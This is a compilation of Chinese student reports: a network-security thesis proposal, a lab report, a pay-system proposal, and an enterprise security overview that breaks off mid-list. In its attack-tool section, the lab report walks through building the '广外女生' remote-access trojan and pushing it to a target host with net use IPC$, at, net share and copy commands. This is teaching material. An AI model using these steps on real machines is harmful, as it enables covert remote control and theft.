企业网络信息安全防御研究开题报告(推荐五篇)

时间:2019-05-14 12:38:32下载本文作者:会员上传
简介:写写帮文库小编为你整理了多篇相关的《企业网络信息安全防御研究开题报告》,但愿对你工作学习有帮助,当然你在写写帮文库还可以找到更多《企业网络信息安全防御研究开题报告》。

第一篇:企业网络信息安全防御研究开题报告

重庆xxxxxxxxx学院

毕业设计(论文)开题报告

学 院 计算机 专 业 信息安全技术 班 级 xxxxxxx 学生姓名 xxxx 学 号 xxxxxxxx 指导教师 xxxxxx

一、毕业设计的内容和意义:(500字左右)

意义:现如今网络发展的越来越快,也越来越便捷,此时也出现了很多安全隐患,所以网络信息的安全就变得尤为重要。企业中的工作便捷也是必须的,故而网络安全则是重中之重。例如黑客恶意攻击该如何防御,遭受入侵该如何将损失降低到最小,或在工作中突然断电让一段时间的工作白费该如何恢复,又或在工作中失误将文件删除该如何找回,这些也都是需要的。一般来说企业内部都会用专门的内网以降低黑客的攻击,但是内网有诸多限制容易影响到工作,这时候就需要制定相应的网络安全防御方案。其中企业网络所存在的危害大致分为内部威胁和外部攻击,其中内部威胁有:软件漏洞、恶意用户、未授权访问、人员错误和软件错误。外部攻击有:恶意代码、系统渗透、中间人攻击拒绝服务、网络嗅探、电磁泄漏和社会工程,我们需要做的便是从这些方面分析该如何设计一套企业安全防御的措施,以保证企业信息的安全。内容:

我所设计的方案主要针对以下几个方面:

(1)网络黑客的攻击。黑客们使用各种工具入侵计算机系统,窃取重要信息或破坏网络的正常使用,严重的情况下,还可能会导致网络瘫痪。

(2)网络病毒的入侵。计算机病毒自出现以来,增长速度惊人,所造成的损失也是不计其数,一旦感染病毒,轻者程序变慢,重者可能造成硬件损坏。此外,木马、流氓软件也对电脑构成了很大的威胁。

(3)企业防范不到位。由于网络涉及企业生产经营的许多环节,整个网络要运行很多业务,因此不可避免地有会来自多方面的攻击。

(4)信息传输中的隐患。信息在从源端到目的端传输过程中不可避免地要造成一定的信息损耗,或者可能被其他人窃取或修改,破坏了信息的完整性。

(5)操作系统和网络协议自身的缺陷。操作系统本身就存在一定的漏洞,导致非法用户未经授权而获得访问权限或提高其访问权限。由于历史原因,有些网络协议在设计时就存在缺陷,比如我们常见的TCP/IP 协议簇,就没有解决好协议的安全问题。

(6)内部攻击。由于对企业内部的防范不到位,企业内部员工有意的攻击或无意的误操作也是网络安全问题的隐患。

(7)网络设备的威胁。

二、文献综述:(300字左右)

《安全等级保护技术培训》讲述了服务器面临的危害大致分为内部威胁和外部攻击两个方面,而数据库面临的危害分为非授权访问、特权提升和SQL注入。《安全等级保护技术培训》详细的讲解了各种操作系统如何测评,以及其测评达标的条件,还有如何准备测评,以及测评的内容和方法,测评的内容大致分为:身份鉴别、访问控制、安全审计、剩余信息保护、入侵防范,恶意代码防范、系统资源控制和备份与恢复。我认为就企业而言身份鉴别、访问控制、入侵防范和备份与恢复这四个方面最重要,这四个方面保证了企业的信息不外漏,信息不丢失和信息不被篡改,很有效的提升了企业网络安全的系数,保证了企业日常的信息安全。从这篇文献中我了解到了等级保护的大致内容和测评的方式。

三、工作计划及方案论证:(500字左右)

工作计划:12月5日到12月15日收集资料 12月16日到12月18日整理资料 12月19日到21日验证方案 12月31日完成报告 17年3月21日提交报告 4月15日准备答辩 方案论证:

信息安全标准是解决有关信息安全的产品和系统在设计、研发、生产、建设、使用、检测认证中的一致性、可靠性、可控性,先进性和符合性的技术规范和技术依据。2001年,我国将ISO/IEC15408-1999转化为国家推荐性标准GB/T18336-2001(CC V2.1)《信息技术 安全技术 信息技术安全性评估准则》。目前,国内最新版本GB/T18336-2008采用了IS0/IEC15408-2005.即CC V2.3。此次我的方案论证借鉴GB/T 18336结构框架和技术要求,包括安全功能要求、安全保证要求和安全保证级的定义方法,以及标准的框架结构等。例如,GB/T20276-2006《信息安全技术智能卡嵌入式软件安全技术要求(EAL4增强级)》借用了PP的结构和内容要求,包括安全环境、安全目的和安全要求(安全功能要求和安全保证要求)等内容,以及CC标准预先定义的安全保证级别(EAL4)。同时,结合国内信息安全产品产业的实际情况,我国信息安全标准还规定了产品功能要求和性能要求,以及产品的测试方法。有些标准描述产品分级要求时,还考虑了产品功能要求与性能要求方面的影响因素。

四、参考文献:(不少于10篇,期刊类文献不少于7篇)

[1]徐东.浅析网络安全技术与企业网络安全对策.《科研》2015年 第06期 11 卷

[2]侯海萍 单建春.云安全技术在企业网络安全中的应用.《工程技术(文摘版)》2016年 第10期 01 卷

[3] 张蓓 冯梅 靖小伟 刘明新.基于安全域的企业网络安全防护体系研究.《计算机安全》2010年 第4期

[4] 王亚原.企业网络安全问题及对策.《太原师范学院学报:自然科学版》2005年 第1期

[5] 鲁海龙 刘淑芬 吴瑶睿 张政祥 崔林涛.企业网络安全关键技术研究.《微计算机信息》2009年 第12期

[6] 赖顺天.企业网络安全的风险与防范.《电脑开发与应用》2008年 第11期

[7] 刘建伟.企业网络安全问题探讨.《甘肃科技》2006年 第5期 [8] 周朝萱.企业网络安全管理与防护策略探讨.《电脑与电信》 2008年 第8期

[9] 朱彤.构建企业网络安全体系.《网络安全技术与应用》2004年 第6期

[10] 张海燕.企业网络安全与发展趋势.《煤炭技术》2005年 第8期

五、指导教师意见:

指导教师(签字)

日期:

六、审查意见:

教研室负责人(签字)

日期:

学院负责人:(签字)

日期:

注:内容为四号仿宋体

第二篇:【企业网络】网络信息安全报告

XX中型企业网安全 网络信息安全报告

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

感谢老师对我们的教导。

第三篇:企业薪酬研究开题报告

企业薪酬管理体系的设计研究开题报告

一、选题的意义与背景

(一)选题意义

全球化金融危机,引发了经济危机及经营市场竞争白热化,产品价格战,企业间的竞争日益激烈,国内各中小企业的生存与发展面临着巨大的挑战。企业间的竞争是人才的竞争,人力资本是企业发展的关键力量,如何吸引人才、留住人才和激励人才是企业人力资源管理的核心问题。伴随着知识经济时代的到来,人才竞争日益激烈,由此便加重了企业人力资源管理方面的一系列压力,薪酬管理首当其冲,薪酬问题已成为约束企业发展的桎梏。

薪酬管理是公司战略和文化的一个组成部分,薪酬不仅是对员工贡献的承认和回报,它还是一套把公司的战略目标和价值观转化成具体行动方案,以及支持员工实施这些行动的流程。健全的薪酬体系有助于降低企业人员的流失,并吸引高级人才,减少企业的内部矛盾,增强企业凝聚力,提高企业员工的综合素质,从而提高劳动生产率,完善企业的机制。但现有的各种薪酬体系也往往不是完美无缺的,每一种都有其不可避免的缺点。因此,这就要求企业根据自己的实际情况,设计一种最适合本企业的薪酬体系,这对于企业的生存与发展具有重要意义。

(二)文献综述

1、国外研究状况

在现代企业管理中,薪酬己不再是单一的工资和纯粹货币形式的报酬,而是内在薪酬和外在薪酬的完美结合。薪酬体系设计的科学合理,可以增强员工对企业的信任感和归属感,能吸引、留住和激励人才。在激励理论方面,西方发达国家已相当成熟,大体上可分为内容型激励理论、过程性激励理论、强化型激励理论三大类。在激励实践方面,西方发达国家也已相当丰富,薪酬激励管理已步入科学化发展轨道。

(1)需求层次理论的应用:马斯洛1943年出版著作《调动人的积极性的理论》,把人的需要分为生理需要、安全需要、社交需要、尊重需要和自我实现的需要五个层次。他认为人在不同的时期表现出来的对各种需要的迫切程度是不同的,人的最迫切的需要才是激励人行动的主要原因和动力。

(2)期望理论的研究:1964年弗隆在他的著作《工作与激励》一书中,首先提出了期望理论。期望理论的基础是,人之所以能够从事某项工作并达到组织目标,是因为这些工作和组织目标会帮助他们达到自己的目标、满足自己某方面的需要。弗隆认为某一活动对某人的激发力量取决于他所能得到结果的全部预期价值乘以他认为达成该结果的期望概率。在进行激励时要处理好努力与绩效的关系、绩效与奖励的关系、奖励与满足个人需要的关系。

2、国内研究现状(1)相关理论研究

薪酬与员工的切身利益息息相关,科学、合理的薪酬体系应能最大程度的调动员工的积极性,能够激励员工自觉自愿地为实现组织目标而努力。国内学者对激励问题的研究始于20世纪80年代末,起步较晚,但发展非常迅速。

《一种新的激励形式—人脉激励》一文:从人脉的概念和分类入手,提出了一种新的激励方式——人脉激励。他们指出经济的发展和竞争的日益激励以及中国特殊的历史文化背景使得不论是企业还是个体都在努力通过人脉关系的有效建立和拓展来实现企业和个人最优化成长和发展。企业只有从人脉需求的现实需要出发,为员工创造人际交往的机会,解决所需的交通工具、费用等硬件设施,并在公司范围内创造良好的人际氛围,丰富企业文化,才能更好地调动他们的积极性,积累企业整体隐形资本,为企业长远发展奠定基础。(赵纳、姜增国,2009)

随着全球经济的迅速发展,人才竞争日益激烈,传统的基于工资,奖金,福利的薪酬组合模式开始显现出局限性,员工更加考虑工资和福利之外的东西,全面薪酬的概念应运而生。

(2)国内现行薪酬体系存在的问题

薪酬管理是企业管理的热点话题。《企业薪酬体系的效果研究综述》一文指出:以往的薪酬研究更多地关注薪酬的决定因素,相对而言,忽视了评估薪酬体系的效果。随着薪酬体系的演变,薪酬体系的效果问题越来越引起研究者的重视。通过综述薪酬体系效果的相关研究,笔者认为,以往的研究存在四个问题:一,以前的一些研究表明薪酬体系不能达到预期的目的。二,薪酬系统与组织的匹配是未来薪酬研究的五大问题之一。三,国内不少企业在学习美国的薪酬体系,到底美国的薪酬体系是否适合中国的文化和中国企业的现状,这是值得深入研究的课题。四,以往研究在分析薪酬体系的效果时,忽略了或没有控制其他激励因素。(姚先国、方阳春,2005)

《民营企业薪酬管理存在的问题及对策》一文指出:现在的民营企业薪酬管理存在许多的问题,如多数员工薪酬很低、员工薪酬待遇既不公开也不公平、员工薪酬不与企业绩效挂钩、拖欠员工工资等现象比较普遍,难以达到预期的激励效果,对于民营企业吸引外来人才,留住优秀人才,激励有用人才,提高组织效率,在激励的市场中立于不败之地是非常不利的。(崔立权,2008)

(3)薪酬体系对激励员工的作用

薪酬激励机制可以调动人的积极性、主动性和创造性。

《发挥薪酬激励的作用》一文指出:薪酬激励不单单是金钱激励,实质上已成为企业激励机制中一种复杂的激励方式,隐含着成就激励等。因此,薪酬激励能够从多角度激发员工强烈的工作欲望,成为他们全身心投入工作的主要动力之一。员工期望通过积极表现,努力工作,一方面提高自己的工作绩效,另一方面争取薪酬的晋升。在这个过程中,员工可体验到由晋升所带来的自我价值实现感和被尊重的喜悦,从而激发他们的工作创造性。这既有利于企业的发展,又能业结成利益共同体,使员工感觉到有创造力才有回报,最终实现双赢。(雷军乐、樊延华,2006)

《薪酬激励-人力资源管理的一柄利剑》一文指出:在今天,薪酬激励成为现代人力资源管理的重要组成部分,它对提高企业的竞争力有着不容忽视的作用。在员工心目中,薪酬不仅仅是自己的劳动所得,它在一定程度上代表着员工自身的价值、代表企业对员工的认同,甚至还代表了员工个人能力、品行和发展前景。所以薪酬不单单是金钱激励,实质上已成为企业激励机制中一种复杂的激励方式,隐含着成就激励、地位激励等,因此,薪酬激励能够从多角度激发员工强烈的工作欲望,成为员工全身心投入工作的主要动力之一。(乔祺,2008)

《宽带薪酬的两面性分析》一文指出:宽带薪酬是现代企业较为流行的薪酬制度。刘宏指出宽带薪酬的实质在于:绩效是衡量薪酬的最终标准和尺度,他传导着以绩效和能力为导向的企业文化。宽带薪酬结构不仅通过弱化头衔、等级、具体的职位描述以及单一的向上流动方式向员工传递一种个人绩效文化,而且还通过弱化员工之间的晋升竞争而更多地强调员工们之间的合作和知识共享、共同进步,以此来帮助企业培育积极地团队绩效文化,而这对于企业整体业绩的提升无疑是非常重要的一种力量。(刘宏,2009)

(4)薪酬体系的发展趋势

合理的薪酬体系是关系到员工生存与发展的一个重要指标。薪酬总额相同,支付方式不同,会取得不同的效果。所以,如何实现薪酬效能最大化,是一门值得探讨的艺术。

《管理中的激励》一文提出:提高薪酬结构的激励性,他们指出如果一个组织中员工的工作热情不高、员工比较懒散,想加大激励力度,可以采用高弹性的薪酬模式,即加大浮动工资/奖金/佣金的构成比例,缩小刚性成分。如果是一个因品牌弱小导致招聘困难的新兴公司,可采用高稳定的薪酬模式,增加薪酬中的固定成分,让员工有安全感。(孙健敏,周文霞,2004)

福利是企业薪酬体系的重要组成部分,从其定位来讲,应该在吸引人才、留住人才、激励人才等方面发挥重要作用,故福利越来越受到企业的重视。但是,由于目前我们大多数企业实施统一的具有普惠性质的福利制度,许多企业在想员工提供福利时发现同意的福利计划很难满足员工的多样性,多层次性的需求,是福利与部分员工的需求脱节,难以发挥激励功能,降低了员工的工作满意度。因此20世纪80年代在美国得到蓬勃发展的弹性化的福利制度引起我国管理界的广泛关注。

3、述评部分

综上所述,从众多学者对企业薪酬体系问题的研究成果来看,薪酬体系设计已被纳入企业的发展战略和管理系统中并被广泛应用。如何制定有科学、合理的薪酬体系是企业面临的一项重要课题。薪酬管理不是对金钱的直接关注,而是关注如何正确的使用薪酬的激励作用,因为即使薪酬绝对金额相等,支付方式不同带来的激励作用也会有很大的差别。企业应注重将内在报酬和外在报酬有机结合适当缩短常规奖励的时间间隔,保持激励的及时性,增强激励的效果。

目前国内外有关薪酬体系设计问题的研究文献很多,但针对某一特定条件下企业如何建立一套有效的薪酬体系的研究还很少,因此,在写作本论文的时候,笔者将在参考大类的文献基础上,结合某企业原有的薪酬制度,来摸索尚未成熟的薪酬体系设计与策略。

二、研究的基本内容与拟解决的主要问题:

(一)研究基本内容:

1.国内外对企业薪酬体系研究情况:薪酬的定义和构成,薪酬设计的理论基础,薪酬激励的含义与内容,我国薪酬体系设计的现状,薪酬体系效果的研究。

2.某企业薪酬体系现状:企业简介,企业现状分析,企业人力资源状况分析,企业现行薪酬体系设计情况,企业现行薪酬体系存在的主要问题,现行薪酬体系对员工的激励效果。

3.提出完善某企业员工薪酬体系的基本对策:企业薪酬体系现状分析,公司薪酬体系设计概述,完善、改良企业薪酬体系方案,企业薪酬方案的实施,新方案的反馈分析。

(二)拟解决的主要问题:

1、通过问卷调查法、面谈法等方法来发现企业原有薪酬体系存在的问题及其所产生的影响。

2、薪酬体系再设计过程中,根据公司实际,通过收集相关资料来设置绩效考核指标权重。

三、研究的方法与技术路线:

(一)研究方法:

1.文献检索。通过收集相关资料了解分析员工薪酬制度的基本情况,了解国内、外对员工薪酬体系的研究动态。从而为本文写作提供相关理论依据。

2.问卷调查。通过问卷调查的形式来收集某企业现有的员工薪酬制度的现状,为本文的写作提供有关数据,为文章写作提供更确实的数据来源。

3.面谈法。通过与有关人员的直接交谈,了解他们对现有薪酬制度的满意度和希望企业为他们做些什么,从而可以对目前的薪酬制度提出更好的解决策略,设计更好的薪酬体系。

4.实证分析。对所收集的资料进行分析,整理出某企业目前薪酬制度的现状及存在的问题,通过定量分析,为论文提供可靠的依据。

第四篇:企业网络信息安全解决方案

企业网络信息安全解决方案

一、信息安全化定义

企业信息安全管理即针对当前企业面临的病毒泛滥、黑客入侵、恶意软件、信息失控等复杂的应用环境制定相应的防御措施,保护企业信息和企业信息系统不被未经授权的访问、使用、泄露、中断、修改和破坏,为企业信息和企业信息系统提供保密性、完整性、真实性、可用性、不可否认性服务。简而言之,使非法者看不了、改不了信息,系统瘫不了、信息假不了、行为赖不了。

二、企业信息安全管理现状

当前企业在信息安全管理中普遍面临的问题:

(1)缺乏来自法律规范的推动力和约束;

(2)安全管理缺乏系统管理的思想。被动应付多于主动防御,没有做前期的预防,而是出现问题才去想补救的办法,不是建立在风险评估基础上的动态的持续改进的管理方法;

(3)重视安全技术,忽视安全管理。企业愿意在防火墙等安全技术上投资,而相应的管理水平、手段没有体现,包括管理的技术和流程,以及员工的管理;

(4)在安全管理中不够重视人的因素;(5)缺乏懂得管理的信息安全技术人员;

(6)企业安全意识不强,员工接受的教育和培训不够。

三、企业信息安全管理产品

建立完善的企业信息安全管理系统,必须内外兼修,一方面要防止外部入侵,另一方面也要防范内部人员泄密可能。所以在选择企业信息安全管理产品时,必须是一个完整的体系结构。目前,在市场上比较流行,而又能够代表未来发展方向的安全产品大致有以下几类:用户身份认证,如静态密码、动态密码(短信密码、动态口令牌、手机令牌)、USB KEY、IC卡、数字证书、指纹虹膜等。

防火墙

即访问控制系统,它在内部网络与不安全的外部网络之间设置障碍,阻止外界对内部资源的非法访问,防止内部对外部的不安全访问。但它其本身可能存在安全问题,也可能会是一个潜在的瓶颈。

安全路由器

由于WAN连接需要专用的路由器设备,因而可通过路由器来控制网络传输。通常采用访问控制列表技术来控制网络信息流。

安全服务器

安全服务器主要针对一个局域网内部信息存储、传输的安全保密问题,其实现功能包括对局域网资源的管理和控制,对局域网内用户的管理,以及局域网中所有安全相关事件的审计和跟踪。

安全管理中心

由于网上的安全产品较多,且分布在不同的位置,这就需要建立一套集中管理的机制和设备,即安全管理中心。它用来给各网络安全设备分发密钥,监控网络安全设备的运行状态,负责收集网络安全设备的审计信息等。

入侵检测系统(IDS)

入侵检测,作为传统保护机制(比如访问控制,身份识别等)的有效补充,形成了信息系统中不可或缺的反馈链。

入侵防御系统(IPS)

入侵防御,入侵防御系统作为IDS很好的补充,是信息安全发展过程中占据重要位置的计算机网络硬件。

安全数据库

由于大量的信息存储在计算机数据库内,有些信息是有价值的,也是敏感的,需要保护。安全数据库可以确保数据库的完整性、可靠性、有效性、机密性、可审计性及存取控制与用户身份识别等。

数据容灾设备

数据容灾作为一个重要的企业信息安全管理体系中的一个重要补救措施,在整个企业信息安全管理体系中有着举足轻重的作用。数据容灾设备包括数据恢复设备、数据复制设备、数据销毁设备等。目前应用较多的数据容灾设备包括效率源HD Doctor、Data Compass数据指南针、Data Copy King硬盘复制机、开盘机等。

编辑本段企业信息安全管理对策 1.网络管理

一般企业网与互联网物理隔离, 因而与互联网相比, 其安全性较高, 但在日常运行管理中我们仍然面临网络链路维护、违规使用网络事件等问题, 具体而言:

(1)在IP 资源管理方面, 采用IP MAC 捆绑的技术手段防止用户随意更改IP 地址和随意更换交换机上的端口。这分两种情况实现, 第一种情况是如果客户机连在支持网管的交换机上的, 可以通过网管中心的管理软件, 对该交换机远程实施Port Security 策略, 将客户端网卡MAC 地址固定绑在相应端口上。第二种情况是如果客户机连接的交换机或集线器不支持网管, 则可以通过Web 网页调用一个程序, 通过该程序把MAC 地址和IP 地址捆绑在一起。这样, 就不会出现IP 地址被盗用而不能正常使用网络的情况。

(2)在网络流量监测方面, 可使用网络监测软件对网络传输数据协议类型进行分类统计, 查看数据、视频、语音等各种应用的利用带宽, 防止频繁进行大文件的传输, 甚至发现病毒的转移及传播方向。

2.服务器管理

常见应用服务器安装的操作系统多为Windows 系列,服务器的管理包括服务器安全审核、组策略实施、服务器的备份策略。服务器安全审核是网管日常工作项目之一, 审核的范围包括安全漏洞检查、日志分析、补丁安装情况检查等, 审核的对象可以是DC、Exchange Server、SQL Server、IIS 等。

在组策略实施时, 如果想使用软件限制策略, 即哪些客户不能使用哪个软件, 则需要把操作系统升级到Windows 2003 Server。服务器的备份策略包括系统软件备份和数据库备份两部分, 系统软件备份拟利用现有的专用备份程序, 制定一个合理的备份策略, 如每周日晚上做一次完全备份, 然后周一到周五晚上做增量备份或差额备份;定期对服务器备份工作情况等。

3.客户端管理

对大多数单位的网管来说, 客户端的管理都是最头痛的问题, 只有得力的措施才能解决这个问题, 这里介绍以下几种方法:

1)将客户端都加入到域中, 这一点很重要, 因为只有这样, 客户端才能纳入管理员集中管理的范围。

2)只给用户以普通域用户的身份登录到域, 因为普通域用户不属于本地Administrators 和Power Users 组, 这样就可以限制他们在本地计算机上安装大多数软件(某些软件普通用户也可以安装)。当然为了便于用户工作, 应通过本地安全策略, 授予他们“关机”和“修改系统时间”等权利。

3)实现客户端操作系统补丁程序的自动安装。4)实现客户端防病毒软件的自动更新。

5)利用SMS 对客户端进行不定期监控, 发现不正常情况及时处理。

4.数据备份与数据加密

由于应用系统的加入, 各种数据库日趋增长, 如何确保数据在发生故障或灾难性事件情况下不丢失, 是当前面临的一个难题。这里介绍四种解决方法: 第一种解决办法是用磁带机或硬盘进行数据备份。该办法价格最低, 保存性最强, 不足之处是备份的只是某个时间点。第二种方案是采用本地磁盘阵列来分别实现各服务器的本地硬盘数据冗余。第三种方案是采用双机容错方式, 两台机器系统相互备份, 应用层数据全部放在共享的磁盘阵列柜中, 这种方式能解决单机故障或宕机的问题, 同时又能防止单个硬盘故障导致的数据丢失, 但前期投资较大。第四种方案是采用NAS 或SAN 来实现各服务器的集中区域存储, 实现较高级别的磁盘等硬件故障的数据备份, 但是成本较高, 一般不能防止系统层的故障, 如感染病毒或系统崩溃。考虑到网络上非认证用户可能试图旁路系统的情况, 如物理地“取走”数据库, 在通信线路上窃听截获。对这样的威胁最有效的解决方法就是数据加密, 即以加密格式存储和传输敏感数据。发送方用加密密钥, 通过加密设备或算法, 将信息加密后发送出去。接收方在收到密文后, 用解密密钥将密文解密, 恢复为明文。如果传输中有人窃取,他只能得到无法理解的密文, 从而对信息起到保密作用。

5.病毒防治

对防病毒软件的要求是: 能支持多种平台, 至少是在Windows 系列操作系统上都能运行;能提供中心管理工具, 对各类服务器和工作站统一管理和控制;在软件安装、病毒代码升级等方面, 可通过服务器直接进行分发, 尽可能减少客户端维护工作量;病毒代码的升级要迅速有效。在实施过程中, 本单位以一台服务器作为中央控制一级服务器, 实现对网络中所有计算机的保护和监控, 并使用其中有效的管理功能, 如: 管理员可以向客产端发送病毒警报、强制对远程客户端进行病毒扫描、锁定远程客产端等。正常情况下, 一级服务器病毒代码库升级后半分钟内, 客户端的病毒代码库也进行了同步更新。

四、企业网络、信息安全解决方案 1)大型企业

大型企业部门林立,相当一部分会在外地有分支机构,业务系统普遍采用建设虚拟专网的方式,起到外部分支访问总部数据的通道和安全加密作用。传统的网络安全设备基本都已经部署,比如防火墙,可以把企业访问互联网的风险降低,但是大型企业的网络、信息安全威胁主要来源于恶意的攻击行为和企业员工有意、无意的操作行为,致使业务系统不能正常使用,或者机密数据外泄,对企业的网络安全,信息保密造成很大的威胁,拥有功能强大的上网行为管理设备、入侵检测系统和防泄密系统能有效杜绝各个环节可能出现的不安全隐患,保障业务系统的政策正常安全运行和企业机密数据的安全。

建议大型企业在网络中部署:防火墙、IDS、上网行为管理、防泄密系统、VPN、安全服务器等。

2)中型企业

中型企业基本已具备完整的网络体系,但是企业的信息化技术力量相对大型企业可能薄弱一点,对于员工的上网行为和电脑操作行为可能要求得不会太严格,即使向员工制定了一定的管理制度,也会在制度的执行过程中因为人为的因素而变成一纸空文,所以用硬件设备来保障和规范网络、信息的安全尤为重要,中型企业的网络、信息安全威胁主要来源于外网的攻击、内部网络使用的不规范导致的木马、病毒等安全威胁。

建议中型企业部署:防火墙、IDS、路由器、上网行为管理、防泄密系统等。

3)小型企业

